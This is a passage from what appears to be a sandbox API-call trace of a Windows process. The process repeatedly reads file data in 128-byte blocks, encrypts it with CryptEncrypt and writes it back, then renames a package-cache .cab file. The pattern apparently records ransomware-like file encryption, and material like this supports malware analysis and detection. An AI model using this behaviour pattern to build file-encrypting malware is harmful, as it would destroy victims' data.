pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.280] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.280] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.280] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.281] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.281] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.282] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.282] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.282] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.282] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.282] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.282] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.282] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.282] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.283] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.283] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.284] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.284] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.906] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), 